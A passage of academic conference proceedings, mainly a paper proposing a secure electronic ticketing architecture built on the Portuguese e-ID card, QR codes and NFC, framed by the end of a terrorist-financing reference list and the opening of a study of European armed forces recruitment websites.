Askari, R. (2011) “Non-resident Bangladeshi: The story of the goose that lays golden eggs”, The Financial Express
(Dhaka), 19 January.
Ballard, M. (2006) US violated world's privacy with secret SWIFT checks [online], Available at:
http://www.theregister.co.uk/2006/09/28/swift_us_privacy_violation
Bligh, A. (2006) “An Analytical Model of Anti-Terror Cross Border Cooperation", in Kempf, W. And Peleg, S. (ed.)
Fighting Terrorism in the Liberal State; An Integrated Model of Research, Intelligence and International Law;
Volume 9 NATO Security through Science Series: Human and Societal Dynamics, The Netherlands: IOS Press.
36

Alexander Bligh
Bloodgood, E. & Tremblay-Boire, J. (2011) “International NGOs and National Regulation in an Age of Terrorism”,
Voluntas: International Journal of Voluntary and Nonprofit Organizations, Vol. 22, No. 1, March, pp. 142-173.
Casey, J. (2007) "Dealing with Hawala: informal financial centers in the ethnic community", FBI Law Enforcement
Bulletin, no. 2, February, p. 12.
Fair Disclosure Wire (2007) “MoneyGram International 2007 Analyst Day - Final” [online], available at:
http://www.accessmylibrary.com/coms2/summary_0286-29974121_ITM
Freedman, M. (2005) "The Invisible Bankers”, Forbes, 17 October, pp. 94-104.
Global Finance (2011) “Looking Ahead” [online], available at: http://www.gfmag.com/archives/133/10949-sponsoredroundtable-cash-management.html#axzz1FQmhHwI0
Hudson R. (2003, revised 2010) “Terrorist And Organized Crime Groups In The Tri-Border Area (TBA) Of South
America; A Report Prepared by the Federal Research Division, Library of Congress under an Interagency
Agreement with the Crime and Narcotics Center Director of Central Intelligence. Federal Research Division
Library of Congress Washington” [online], available at: http://www.loc.gov/rr/frd/pdf-files/TerrOrgCrime_TBA.pdf
Olson, D. (2007) "Financing Terror", FBI Law Enforcement Bulletin, no. 2, February, pp. 1-5
Razavy, M. (2005) "Hawala: An underground haven for terrorists or social phenomenon?", Crime, Law & Social
Change, vol. 44, no. 3, October, pp. 277-299.
Shields, P. (2005) "The ‘Information Revolution’, Financial Globalization, State Power and Money Laundering",
Journal of International Communication, vol. 11, no. 1, pp. 15-39
"Wired Efficiency", Treasury & Risk (1 June 2007), pp.15-16
37

A Secure Architecture for Electronic Ticketing Based on the
Portuguese e-ID Card
Paul Crocker 1, 2 and Vasco Nicolau 1
1
University of Beira Interior 6201-001 Covilhã, Portugal
2
Institute of Telecommunications, Covilhã, Portugal
crocker@di.ubi.pt
m2207@ubi.pt
Abstract: The current state of the art for electronic ticketing is based around a mobile concept, where the diverse
players involved, clients, payment agents, mobile operators and merchants, often have different and competing
needs in terms of technology and very often security. In this paper we shall discuss and analyse the security of
current electronic ticketing, payment, delivery and authenticating systems and show that today’s new payment
system has the mobile operator as a central player and the mobile phone, giving its undisputed role in today’s
society, as a central agent. We shall then propose and describe a new innovative architecture for electronic ticketing
that makes use of the Portuguese national electronic identity (e-ID) card as a fundamental aspect of the security of
the ticketing architecture. This architecture is combined with the latest technologies such as NFC enabled mobile
handsets. We shall describe the potentialities of our architecture to store electronic tickets, in the form of QR-Codes,
in a secure way. We shall also how the proposed architecture permits flexible authenticating scenarios for the
eTickets based on the different levels of security which may be required for any given scenario. Different scenarios
range from low level and rapid authentication for mass transit system to the stronger authentication level required for
the delivery of high value items and to the stringent security required at border controls. The flexibility and secure
authentication is made available due to the cryptographic PIN and biometric authentication available on national and
in particular Portuguese National e-ID cards.
Keywords: electronic ticketing, identification cards, security, mobile authentication, cryptographic signatures
1. Introduction
The continuing evolution of Information and Communication Technologies (ICT’s) has enabled the
continuing take up of eCommerce services and products, the growth in such services has been driven by
the Internet however new technologies are also driving new products, services and opportunities based
around a mobile and ubiquitous concept. The Internet has however often been associated with
cybercrime, cyberwarfare and general criminal behaviour, in fact the online world is subject to the same
security and privacy concerns of the real world and it is therefore increasingly important to guarantee our
security and our privacy in the information society. This is especially true in the context of online
electronic sales and transactions for goods and services with the move away from paper documentation
for ticketing, invoicing etc. and towards the increasing use of electronic documentation.
The new ICT’s enable the ease, speed and automation of operations that modern society requires.
Unfortunately a consequence of this change has been a sensation of unreliability and insecurity on the
part of the general public. Taking into account that security is an essential element of any system we
shall propose in detail a new computing architecture for electronic ticketing which covers the entire tickets
lifecycle, namely the booking, purchasing, authentication and validation of the tickets. This innovative
architecture makes use of national electronic identity (e-ID) cards as a fundamental aspect of the security
of the ticketing architecture. Technologies used include Near Filed Communication (NFC), the Global
System for Mobile (GSM) communications, the Quick Response 2-D Bar Code (QR-Code) format,
Biometrics and Mobile Computing with the overall aim of using the best characteristics of each
technology and designing and prototyping a safe, secure, flexible, innovative and commercially viable
architecture. One of the principal contributions of this article is the way that the Citizens electronic
Identification (e-ID) Card is integrated into the security layer of the proposed architecture. The main use
of the Citizens Card is to strengthen the ticketing system from the viewpoint of personal identification and
authentication. A resilient system, associated with the digital identity of citizens throughout the life cycle
of tickets will be described. In order to achieve this we make use of a new Middleware for the
(Portuguese) Citizens Card that has been developed by the authors (Crocker, de Sousa, & Nicolau,
2010).
The rest of this paper is organized as follows: In section2 a brief review of the state of the art in
eTicketing is given. Section 3 discusses the use of e-id cards. Section 4 describes in detail the eTicketing
architecture and in section 5 the secure authentication mechanisms at the merchant are explained. This
38

Paul Crocker and Vasco Nicolau
is then followed in section 6 by an analysis of the proposed architecture. The final Section presents the
conclusions.
2. eTicketing
Today the vast majority of users store personal information, such as notes, calendars, photographs,
contacts and even information about credit cards and passwords on their mobile devices. Given the
undoubted importance of the mobile society, this trend will most likely continue and in the near future, the
device will also be used to pay for goods and services, contact with government entities or even to cast
ones vote. As a consequence of this evolution, mobile phones are seen by citizens as indispensable
devices, bearers of a personal identity that is in constant mobility, connectivity and updated with the latest
information and services.
Mobile devices are being used to transport tickets, pay for services using the mobile Internet and to
access banking operations. Examples from Portugal are MB-Phone (SIBS 2010) for banking operations
and Movensis (Exame Informática 2010) for vending machines. In terms of security there is always the
difficult task of remotely authenticating users and providing an adequate level of acceptance and nonrepudiation
of transactions. This is due largely to the fact that the overwhelming majority of current
solutions are based on infrastructures maintained by network operators or financial institutions (Oberthur
2009). Today’s payment system consists of several actors, traditionally the banks, the consumers and the
merchants. However the effect of the mobile has to bring a new player into the system, notably the
mobile phone operator as illustrated below in Fig 1.
Figure 1: Illustration of the new payment system
2.1 Examples of current electronic payment and ticketing systems
Here we describe some typical services.
M-Pesa – a mobile-phone based money transfer service. With M-Pesa and a mobile phone it’s
possible to transfer money and to pay for purchases from a merchant. Payments are processed via a
simple transfer from the balance of the citizens mobile to a merchants account via SMS (Hughes, N
and Lonie, S 2009).
Movensis – the solution consists in the simple use of mobile phones to transfer money from a
personal account to the account of the operator of a vending machine (merchant) in order to obtain a
product. The customer has to first access the application on the phone with a PIN physically identify
the serial number of the machine and then send an SMS with this identification plus the amount to be
spent. This process allows the bank to transfer money from the clients account to the merchants
account, in the case of a vending machine the credit available appears on the machine itself.
39

Paul Crocker and Vasco Nicolau
Sport Lisboa e Benfica (Football Ticket) – the solution is to buy a ticket for a football game using the
clubs web site (using a payment agent such as VISA). The clients’ mobile phone then receives the
ticket in the form of a QR-Code with their credentials. The validation stage is simply to validate the
QR-Code received when read at a terminal at the football stadium.
Portuguese Train Company (CP) (Train Ticket) – At the online site of the Merchant the client checks
train and seat availability and pre-pays for the trip (using a payment agent, VISA). The customer then
receives a clear text SMS with the ticket on their phone, this is called a “netTicket”. On the train the
ticket inspector authenticates the validity of the “netTicket” and the client by simply inspecting the
SMS and possibly verifying the ticket (not the holder) using the CP back office IT system.
2.2 Security concerns
Based on the systems described previously and others some general security concerns can be identified.
Difficulties in retrieving the ticket due to theft or loss of the phone or lack of battery power.
The need to enter an application specific PIN to validate an operation is a concern principally
because people are reluctant to learn more than one PIN and often keep the PIN on (or near) the
phone itself.
The ticket is usually stored in clear text on the phone (SMS/QR-Code) and it is therefore a trivial
matter for an attacker to know where to use it.
The difficulty in ensuring that the holder of the ticket is indeed the rightful owner of the ticket.
Mobile phones are subject to the same type of attacks and vulnerabilities (viruses, trojans, phishing
etc.) as traditional computers. Hence one must consider that mobile devices are untrustworthy
computing devices (Enisa 2008). One consequence of this is the possibility of (undetected or
otherwise) theft of the ticket.
Fraudulent Copies of the ticket on the mobile phone are also a concern.
3. e-ID Cards in society
Personal identification documents are undergoing changes all around the world, most notably in the
transformation of conventional paper documents to an e-ID format similar to modern electronic credit
cards (smart cards). The success of a number of countries in the adoption of e-ID documents is due to
various factors, for example, the high level of security that such a document offers (resistance to
penetration attacks, forgeries etc.). Another important aspect of their success is the ability of e-ID
documents to integrate with electronic services and the interoperability between national e-ID cards, see
for instance the STORK project to establish a European e-ID Interoperability (Leenes, R 2009).
Electronic documents are seen as safe, simplify the day-to-day lives and at the same time reduce costs
in operations to control fraud. National security and defense entities have therefore welcomed their
implementation due to the simplification it provides and the services that are provided such as identity
authentication, secure electronic document signing and enabling access to governmental services such
as tax. There are also many examples of new innovative services being associated with such cards, two
examples are the use of the national e-ID card in the Estonian transport system and the Kids-ID system
in Belgium for safe logon to online chat rooms (Eched, Y, Billiaert, E & Veyret E 2009).
3.1 Functionalities of the Portuguese e-ID card
In this section only key features associated with the Portuguese Citizen Card (CC) will be stated, more
details can be found at the e-ID portal (www.cartaodecidadao.pt).
The CC is a Java smart card. The on-card chip contains the citizens’ personnel information, a private
writable information space (1Kbyte) and a biometric fingerprint template and cryptographic keys and
digital certificates of the Portuguese Justice Ministry Public Key Infrastructure. The relevant information
on the card is accessed by java applets (Rankl 2007) as shown in Fig 2. The card contains three
Personnel Identification Numbers (PINs), mechanisms for altering the PINs and internal cryptographic
processing. It is combatable with multi-channel card readers for authentication and digital signatures (IAS
applet), permits the generation of one-time passwords (OTP applet) and executes Match-on-Card (MoC
applet) biometric validation of fingerprints.
40

Paul Crocker and Vasco Nicolau
Figure 2: Diagram of applets installed in the Portuguese Citizen Card
The next section describes in detail the proposed architecture for secure ticketing that uses an e-ID card
as an integral part. The resulting system is not intended as a competitor of systems developed by large
organizations but can be seen as a security layer which could be integrated into existing ticketing
systems.
4. Secure eTicketing architecture
In this section the requirements that the security platform should offer are first defined, a brief description
of the information flow in the system is given and the use of the e-ID in the security platform is described.
4.1 Requirements
Based on the security concerns of current electronic payment systems we conclude that depending on
the type of system and its target audience different forms of validation/authentication of the end user and
ticket are required. This requires the security layer to be flexible to the point where it is possible to
support different authentication environments. For example, purchasing and subsequent validation of a
bus ticket is quite different than validating a ticket that permits the pick up of a newly purchased car. The
security level should also be flexible in situations where fraud has been detected and it is necessary to
dynamically increase the level of authentication as was the case at U2 concerts in Coimbra, Portugal
(2010) and Boston, USA (2005) – there needs to be a mechanism of digitally providing proof that the
holder of the ticket is the owner of the ticket and that the ticket is valid.
Three levels of authentication have therefore been defined:
Weak - cases where a fast authentication of the ticket (e.g. public transport) is required
Strong - situations where it is necessary to ensure maximum safety for both the merchant and the
client. For instance where it’s necessary to authenticate the client as the valid owner of the ticker via
his e-ID, examples of such situations are: when receiving high value goods, when receiving
prescription drugs at pharmacies, at high risk sporting where it’s necessary to exclude certain
individuals and at musical events in order to avoid ticket fraud.
Extra Strong - specific cases where it is necessary to provide additional guarantees other than the
authenticity of the ticket holder's e-ID card– (e.g. biometric authentication at airports and borders).
With respect to the information flow between all the players it is desirable to use the best available
technologies. QR-Code and NFC technology were chosen for the transport and communication of the
electronic tickets as these technologies are particularly well suited to mobile devices.
Finally it was decided to make use of a Payment Agent as this resolves problems concerning payments
and is quite a common procedure. The payment agent can of course be any available online payment
technology company.
41

4.2 General overview
Paul Crocker and Vasco Nicolau
The following figure, Fig 3, shows the proposed ticket life cycle. The process starts with the purchase of
some good or service via an online web site/shop. The client receives an electronic SMS message with
the payment reference (and optionally an email with a copy of the respective data). The client then
proceeds to a payment agent (for example PayShop, http://www.payshop.pt/) where the client provides
the payment reference information on his handset via an electronic channel (NFC) or via a simple visual
reading. The purchase may in fact be made directly at the payment agent, in which case there is no need
to send the SMS with the reservation code to the client.
The payment agent is then responsible for constructing the secure eTicket. This process requires the
client to provide his e-ID card and to authenticate himself. After the reference has been paid for the
eTicket, a QR-Code, is then delivered to the client – either by sending a MMS or directly using NFC. The
data is also sent to the Merchant for use in the validation process. Finally at the Merchant the client will
authenticate himself, the merchant will validate the eTicket and authenticate the client and then deliver
the goods/services.
Figure 3: Architecture and life cycle of the secure eTicket
4.2.1 Online website
This is designed as a web portal, Fig 4, with associated services, back office data bases, email and GSM
server (for sending SMS messages) available via web services for maximum flexibility.
Figure 4: WebShop platform
42

4.2.2 PaymentaAgent
Paul Crocker and Vasco Nicolau
At the payment agent, Fig5, the client presents the payment reference (the SMS on his handset) using for
instance NFC to transmit the reference details to the payment agent, effects payment and in return
receives the eTicket. The payment agent needs a card reader (to read the clients e-ID card) and a
cryptographic unit for calculating checksums and for digitally signing the ticket. The payment agent also
needs access to the Web Services described in the previous section to access the payment reference
details (back office data bases) concerning the particular event/service and also to access the GSM
modem in order to send the eTicket via MMS (alternatively from the payment agent to the client using
NFC).
Figure 5: Payment agent platform
4.2.3 Merchant
The merchant module, Fig6, concludes the tickets lifecycle. This is the point where the client receives the
goods or services purchased, for instance access to a sporting event, pick up of goods purchased online
at a warehouse or shop, ticket validation on a transit system etc. At this point the Merchant needs to
guarantee the authenticity of the eTicket and the validity of the client holding it. In order to have a flexible
system not reliant on one particular technology the solution proposed uses various technologies. To
authenticate the client the Merchant obtains the ticket held on the clients’ phone using for example
wireless communication, NFC or an optical reading using a bar code reader (or even a simple Web-
Cam). The smart card reader is necessary in order to obtain the authentication and or biometric
credentials of the client.
Figure 6: Merchant validation
43

4.3 Security layer
Paul Crocker and Vasco Nicolau
The proposed architecture is in some cases similar to current ticketing systems, these similarities are
more obvious in relation to the information system. However, the proposed architecture makes the
interconnection of multiple technologies such as NFC, QR-Code and e-ID cards that in conjunction with
the mobile phone results in an innovative system that is practical, secure and functional, Fig7. Although
at the technological level the system is innovative, what stands out in comparison to all the other systems
is the security layer. That is, while similar systems (e.g. public transport Ticketing-OTLIS) centralize the
security of the system in technology (e.g. RFID cards) or Back Office Systems, the whole security of the
system presented is based on the security credentials of the CC.
Figure 7: Ticket-ID: Secure eTicketing
4.3.1 Security layer
As stated earlier the paying agent is responsible for constructing the ticket. The exact process of
constructing the ticket is illustrated in Fig8.
Figure 8: The process of eTicket construction
1. In the first step the client at the payment agent presents his reference number, received via SMS and
held on his mobile phone (also sent by email). The system will then read this data (via NFC).
2. A ticket in the context of the system is composed of several elements, including the data resulting from
the payment and details of the event as shown below in Fig9. After constructing this ticket the system
applies a cryptographic Hash function (MD5). The derived HASH is given the name eTicket.
3. The credentials of the personal identity of the citizen are then associated with the eTicket by digitally
signing the eTicket, this is done on the e-ID card using (in the Portuguese case) the algorithms SHA1
44

Paul Crocker and Vasco Nicolau
with RSA [NIST 2009]. The process of signing the eTicket implies that the user enters their digital
signature PIN in order to confirm the operation.
Figure 9: The eTicket attributes before applying the hash function
4. The result of the previous cryptographic operation is a digital signature of the eTicket, which is given
the name of “Ticket-Control”. At this stage, the Ticket-Control enables one to identify unequivocally the
owner of the ticket.
5. After constructing the Ticket-Control three parallel operations are made (i) the Ticket-Control is stored
in the Merchants back office, (ii) the QR-Code that contains a digital representation of the Ticket-Control
is constructed and, (iii) most crucially and importantly the eTicket is divided into two parts of differing
sizes:
The smallest part is the first 4 bytes (see Fig10) of the eTicket (the hash). To this is added a reference
tag to identify this data as originating from a secure eTicket and a simple 10byte checksum (see Fig 11).
The importance of the identifying tag is that it enables the customer to track and identify the ticket on the
national ID card. The checksum is needed to eliminate any data errors and ambiguities that may arise in
the data transmission. This data is then written onto the e-ID card. In the case of the Portuguese card
there is a maximum of 1Kbyte of data that the card holder may read/write.
Figure 10: The construction of the eTicket
45

Paul Crocker and Vasco Nicolau
The second larger part is the 12 byes (see Fig10). This data is also encapsulated with a Tag and
checksum and sent to the merchant. This data will be necessary in order to perform a strong
authentication of the client and eTicket.
Figure 11: Example of the data held on the Portuguese e-ID
6. The final stage is to send the QR-Code containing the Ticket-Control to the client’s mobile, either by
sending a MMS or via NFC.
5. Secure authentication at the merchant
The final part of our system is the act of authentication of the client and the Merchant. This is the point
where the client receives the goods or services that have been paid for. As explained in section 4.1, three
different authentication scenarios have been defined, their implementation is now described.
5.1 The weak authentication process
The weak authentication process consists of obtaining the QR-Code via one of three possible
technologies on the merchant's side. This can be decoded and the Ticket-Control obtained. In this simple
case all that is necessary is that the Merchant compares this Ticket-Control to the one in the Merchants
back office information system, see Fig12. Weak authentication is advantageous in scenarios where
ticket validation needs to be rapid. In these cases the value of the ticket is usually limited and as such it is
not necessary to have a demanding security framework. For example, access to public transportation or
entrance at concerts, theatre and cinema that do not require high security.
Figure 12: Weak validation process
46

5.2 Strong authentication process
Paul Crocker and Vasco Nicolau
As in the weak validation process the first step is to obtain and decode the MMS in order to obtain the
Ticket-Control. The next step is to validate the Ticket-Control, Fig13, but in this case we wish to provide
proof that the client is indeed the purchaser of the goods or services being requested. This is established
using the following procedure.
Figure 13: Strong authentication process
1. The merchant has the Ticket-Control plus ¾ of the original eTicket.
2. The client introduces his e-ID card into the Merchants card reader to obtain the remaining ¼. This way
the Merchant is able to obtain the complete eTicket.
3. The merchant then requests that the client signs the eTicket using his PIN thereby re-creating the
Ticket-Control.
4. At this point it’s possible for the Merchant to compare the Ticket-Control that he has just recreated with
the Ticket-Control in his back office information system.
5. In case it should be necessary the merchant can additionally request the Ticket-Control the client
received on his mobile phone, thereby preventing and problems associated with theft of the e-ID card. In
this case if the three Ticket-Controls are equal then the ticket is valid.
5.3 Strong biometric authentication process
In sensitive environments, for example at airports, it may also be necessary to authenticate biometrically
the card holder. In this case, apart from verifying the Ticket-Control, it is also required to identify the
citizen who presents the e-ID card. For this the biometric fingerprint validation (Match on Card)
functionality of the e-ID card is used. This process, Fig14, allows a more robust proof that whoever holds
the identity card has the corresponding identity of the card and hence is the owner of the eTicket (digital
signature). Note that this validation process does not add more security from a cryptographic point of
view; it does however verify the identity of the document and its owner.
47

Figure 14: Strong biometric authentication
6. Analysis of the architecture
Paul Crocker and Vasco Nicolau
The advantages and disadvantages of the architecture proposed, its robustness and resilience to attack
are now discussed in brief.
6.1 Fraud
The payment agent has knowledge of the eTicket (Hash) however the possibility of (re)creating a valid
but fraudulent eTicket is limited. This is due to the fact that in order to achieve this the payment agent
would have to recreate a valid Ticket-Control, but in order to do this the payment agent would need the
credentials of the citizens card (PIN) and the actual card itself – as the signing process is done on the
card. Hence the security is as solid as the overall e-ID card security. Note any Payment Agent should be
identified and registered and comply with minimum security requirements.
If the Ticket-Control is compromised, either by theft at or in transmission to the back office information
system then the attacker could feasibly use this information. However it would still be necessary to
identify the service/good purchased and the attacker could only use the ticket in the case where only the
simple authentication process was necessary. This opens the interesting possibility of changing a simple
authentication to a strong authentication if such a theft was discovered and the use of random spot
checks (simple to strong) as a dissuading method.
The system is also safe from more complex attacks such as in the situation where a phone that contains
an eTicket for a flight is stolen and the clients’ national e-ID card is also stolen. In this case, the attacker
may even know the signing PIN and could thus pass the strong validation, but in this type of scenario it is
often necessary to validate the owner of the ticket, biometrically using Match-on-Card or via some other
proof such as possession of a passport.
6.2 e-ID storage capacity
The e-ID cards have a reduced private writable information space (notebook) therefore it’s up to the client
to manage this space efficiently and correctly. Tools can be provided to help the client in this process,
either Web based or for download and also made available at the Payment agent, Merchant’s Site etc. In
the event of the citizen or other application deleting by mistake or maliciously the contents of the e-IDs
notebook area then the immediate consequence is the citizen would be unable to use the ticket if strong
authentication was required, since this type of authentication requires the use of citizen's card and the
reconstruction of the Ticket-Control using the information that was on the card. In this case the citizens
would have to return to a payment agent to address the problem.
48

6.3 Robustness
Paul Crocker and Vasco Nicolau
The fact that the eTicket is placed on the e-ID card and not on the phone makes the system robust with
respect to theft of the mobile phone. Consider what happens in the event the phone is stolen or the
customer loses the Ticket-Control. In this situation the customer must notify a payment agent, who may
then modify the weak validation process to strong authentication, which implies the use of citizen's card
and in this case the ticket is guaranteed not to be used fraudulently. In the worst-case scenario the e-ID
is also stolen and then an attacker would also have to know the PIN authentication. In this more serious
situation, after a client has notified a payment agent of the theft, the system should automatically modify a
strong validation type to "extra strong" requiring biometric validation.
In situations where the QR-Code is unable to be read correctly, for instance if the phone loses battery
power or problems with image quality then there are several alternatives, in the case of an NFC enabled
mobile phone then it may still be possible to use the phone to read the QR-code as NFC uses magnetic
field induction (GSMA 2007) for power. On the other hand the QR-Code can be printed avoiding image
quality problems on the handset. Finally the client can ask that the authentication level be raised to strong
and in this case the QR-Code can be replaced by the e-ID.
7. Conclusions
This paper has described an innovative system using the e-ID citizen cards and digital signature
mechanisms. The security layer has introduced the concept of three levels of security for the
authentication process which allows the system to be both flexible and able to adapt to the dynamic
needs of each of the players involved and the individual event or service requirements. Although
associated with ticketing its implementation in other areas and in other contexts, such as audit trails for
confidential documents, could also be advantageous and is being explored.
In conclusion, the architecture described provides a simplified view of the mobile payment authentication
and validation environment, which doesn’t change the common habits of people and is consistent with
modern trends where the mobile is used to store/transport information. It makes use of the best current
technologies NFC/QR-code in a mobile environment. It makes use of the Portuguese e-ID, a trusted,
secure and credible document to provide a mechanism for flexible, secure authentication and validation
of tickets.
References
Crocker, P., de Sousa, S. M. & Nicolau, V. (2010) Sniffing with Portuguese Identity Card for fun and profit,
Proceedings of the Ninth European Conf. on Information Warfare and Security (ECIW 2010).
Eched, Y, Billiaert, E & Veyret E. (2009) e-Gov 2.0 The Keys to Success, Gemalto White Paper [online]
http://www.epractice.eu/en/library/292758 [Accessed 9 March 2011]
Benito, R et al. (2008) Security Issues in the Context of authentication using mobile devices, Editors: Naumann,I and
Hogben,G, European Network and Information Security Agency (ENISA) [online],
http://www.enisa.europa.eu/act/it/eid/mobile-eid/at_download/fullReport [Accessed 9 March 2011]
Exame Informática (2010) Movensis e CGD vão estrear pagamentos por telemóveis, [online],
http://aeiou.exameinformatica.pt/movensis-e-cgd-vao-estrear-pagamentos-por-telemovel-video=f1007055.
[Accessed 9 March 2011]
GSMA (2007), Mobile NFC technical guideline, [online], http://www.gsmworld.com/documents/ gsma_nfc2_wp.pdf.
[Accessed 9 March 2011]
Hughes, N and Lonie, S (2009) M-Pesa: Mobile money for the unbanked. Innovations: Technology, Governance,
Globalization 2007 2:1-2, 63-81
Leenes, R et al (2009) Towards pan- European recognition of electronic ID.The Stork e-ID consortium, [online],
https://www.eid-stork.eu/dmdocuments/public/D2.2_final._1.pdf. [Accessed 9 March 2011]
NIST, National Institute of Standards and Technology (2009), Digital Signature Standard, [online],
http://csrc.nist.gov/publications/fips/fips186-3/fips_186-3.pdf. [Accessed 9 March 2011]
Oberthur (2009) Bank ID for SEB, [online] http://www.oberthur.com [Accessed 9 March 2011]
Rankl, W (2007) Smart Card Applications Design Models for Using and Programming Smart Cards, John Wiley,
England.
SIBS (2010) SIBS MB-Phone, [online], http://www.sibs.pt/pt/mb/prodserv/mbphone/. [Accessed 9 March 2011]
49

Evaluation of the Armed Forces Websites of the European
Countries
Pedro Cunha 1 , Parcídio Gonçalves 1 , Vítor Sá 1 , Sérgio Tenreiro de Magalhães 1 and
Miguel Pimenta 2
1
Universidade Católica Portuguesa, Braga, Portugal
2
Regimento de Cavalaria 6, Exército Português, Braga, Portugal
pjgscunha@gmail.com
parcidio@gmail.com
vitor.sa@braga.ucp.pt
stmagalhaes@braga.ucp.pt
pimenta.jmas@mail.exercito.pt
Abstract: The armed forces are a critical component of the national security strategy of several European countries.
Despite the peace that has succeeded the cold war, several armies, in peacetime, have elements recruited with
promises of individual opportunities. The countries have two forms of recruitment of their troops: by volunteering or
by mandatory incorporation. Following the trends of the modern world, interconnected in a network, it becomes
essential to the institutions to mark their presence on the Internet. The Armed Forces in their various branches are no
exception; there are numerous sites with relevant information, being used as a channel for dissemination and
fundraising. Since young people represent a large share of the population using the Internet, and this is the target
population for recruitment, it becomes mandatory to use the internet as a communication channel between them. It
was carried out a qualitative study of all sites of European armed forces, and their branches, in order to assess their
quality and differences. The approach focused on the evaluation of sites for their ability to inform, update, quantity
and quality of content, service availability, use and visual attractiveness, and ease of communication. The study has
also tried to verify if the countries with volunteer incorporation were producing websites with higher levels of quality,
reflecting the need to invest in order to recruit. On the other hand, countries with compulsive incorporation could have
lower investments in their websites, once the satisfaction of the need for staff is guarantied. We considered 38
countries, with an initial usability study where data about the characteristics considered important for proper
construction of a website as well as for a good and easy relationship with the user of this type of site were collected.
This research defined the parameters to evaluate the sites and groups were created with the parameters of the
different areas of analysis of those sites. The evaluation shows that there are differences in quality of sites for each
of the countries evaluated in terms of graphics, usability and content, and that where there is a greater difference
between the countries is on the number of existing sites by country. It is clear that there are countries that invest
strategically in this area while others do not. It was also clear that there is a difference between Eastern and Western
Europe in the quality and investment made in the sites of their armed forces. Dividing the countries by their
incorporation system, the differences are smaller, both in terms of number of sites for the military, either as to the
average assessment of each scheme. In countries where the incorporation is mandatory, investment in independent
sites for each branch has not been neglected for a considerable part of the countries, a little more than half. But it is
in countries where recruitment is made on a voluntary basis that there are more sites for the different branches,
which may indicate an existing competitiveness for staff recruitment.
Keywords: armed forces, websites, recruitment, Europe
1. Introduction
The aftermath of Second World War led to a growing sense of concern for the safety of the population.
This situation has led to many European countries to take concrete actions, embodied in adherence to
collective defense organizations (NATO and Warsaw Pact) and the reorganization of its armed forces, to
ensure the integrity of its territory and the security of their populations. This feeling of security and
insecurity, embodied in a mutual fear that characterized the period of the Cold War, would end only with
the demise of the Soviet Union in 1991. In this period of nearly 40 years, we have seen the recruitment of
large numbers of civilians for entry into the armed forces of most countries in Europe, leading in many
cases oversized armed forces to the real needs of some countries. The recruitment was standard
practice for ensuring the maintenance of staff seen as necessary.
This situation changes from 1991. The level of conventional threat against European countries was
substantially reduced and the non conventional threat is to assume, since then, greater attention by
states and organizations responsible for security. Inevitably, the armed forces follow this amendment,
feeling an increasing need to improve its quality over quantity. The technological evolution of military
equipment, catalyzed by the incessant demand for weapons systems more efficient to cope with an
increasingly effective enemy, requires the existence of military increasingly better prepared. This reality
50

Pedro Cunha et al.
has led some European countries to evolve to different systems of recruitment and training, better
adapted to the new reality and new weapons systems.
Therefore, it becomes interesting to understand the reality of the armed forces of European countries by
analyzing the recruiting method they use and how the divulgation made at sites they have, does or not,
change the number and the quality of the civilians who are presented to serve their armed forces and
their countries.
1.1 State of the art
The armed forces are an integral part of society in various countries of Europe. As regards Anna
Leander, it is argued to be important to integrate society, to form political organizations, to ensure civil
states and to control the use of violence in society (Leander, 2004). According to Stanislav Andreski,
military organizations influence the social structure, especially by determining the distribution of power or,
in other words, the ability to use violence (Andreski, 1968). As referred previously, the society is
constantly evolving, and the various branches of the armed forces felt the need to monitor these
developments. As stated by Alfred Vagts, we can say that each stage of social progress or regression
produced military institutions in accordance with their needs and ideas, its culture and its economy
(Vagts, 1981).
One of the factors that most influence had in the paradigm shift of the armed forces, in Europe and in the
rest of the world, was the end of the Cold War. As noted by John J. Mearsheimer, the profound changes
in course in Europe have been widely seen as harbingers of a new era of peace. With the end of the Cold
War, it is said that the threat of war looming over Europe for over four decades are evaporating
(Mearsheimer, 1990).
In the last three decades the army in peacetime recruited with promises of individual opportunities:
money for college, professional skills, achievement, adventure and personal transformation. At first of a
controversial war, many of those promises sounded inappropriate, if not absurd (Bailey, 2007).
Because of this reality and during this period, there was a military change in its relationship with market
logic, which occurred naturally and virtually invisible. This change was an unintended consequence of
changing to the voluntary regime (Bailey, 2007).
Some European countries have decided to end the recruitment as a result of geopolitical change and the
limited utility of recruits for the post cold war missions, although other European countries plan to
maintain recruitment despite these same factors. Thus, it is probable the extinction of recruitment in
armies that seek to reduce the number of recruits, and the maintenance of this characteristic in the
armies which aims to increase the number of assets, and in armies of militia type (Jehn & Selden, 2002).
The European countries that continue to use conscription have cited his alleged budgetary savings,
almost as its only justification. In the period in which we live, post-war and post-Cold War era,
conscription may not finish in Europe however its importance is no longer relevant (Jehn & Selden,
2002).
The armed forces are also shaped by advertising for recruitment, since advertising can reach a greater
number of recruitment-age populations more quickly and economically. The military advertising tries to
incite the act of relatively low cost of contacting a recruiter or go to the army website (Bailey, 2007). The
Internet and the increasing number of sites as an advertising medium, has become an undeniable reality
in the information age in which we live. The armed forces being part of the society and the world are
using this concept as a channel for dissemination and fundraising. As John Thompson, the development
of communication mediums has changed in a profound and irreversible way the nature of communication
in contemporary society (Thompson, 1995).
Networks are very old forms of human practice, but took a new life in our time by becoming information
networks, fueled by the Internet (Castells, 2002). Since young people represent a large share of the
population using the Internet, and this is the target population for recruitment, it becomes mandatory to
use the internet as a communication channel.
51

1.2 The problem
Pedro Cunha et al.
The adoption of the Internet as a means of communication by the armed forces raises the question of its
effectiveness and its real significance in the society to which they are intended, taking into account the
reduction of the population of military age and distinguishing between those who have a need for
volunteer recruitment and those with obligatory military service.
With this article, we intend to carry out a qualitative study of all sites of European armed forces, and their
branches in order to assess their quality and differences. The approach will focus on the assessment of
sites in the following aspects: its ability to inform, update, quantity and quality of content, service
availability, use and visual attractiveness, and ease of communication. It will be also examined in
countries where the merger is voluntary, if there is a greater investment in the sites of the armed forces,
and their quality compared to the countries in which the incorporation is obligatory.
2. Methodology
This article reveals a qualitative study of sites of European armed forces, which considered the following
38 countries: Albania, Austria, Belarus, Belgium, Bosnia and Herzegovina, Bulgaria, Croatia, Denmark,
Slovakia, Slovenia, Spain, Estonia, Finland France, Greece, Hungary, Ireland, Italy, Latvia, Lithuania,
Luxembourg, Macedonia, Malta, Moldova, Montenegro, Norway, Poland, Portugal, United Kingdom,
Czech Republic, Romania, Russia, Serbia, Sweden, Switzerland and Ukraine. The evaluation was
excluded, for not having armed forces, the following countries: Andorra, Iceland, Liechtenstein, Monaco,
San Marino and the Vatican. Due to its diplomatic complexity, Cyprus was also excluded, since that
territory has two armed forces, one on the Greek side and another on the Turkish side (CIA, 2011).
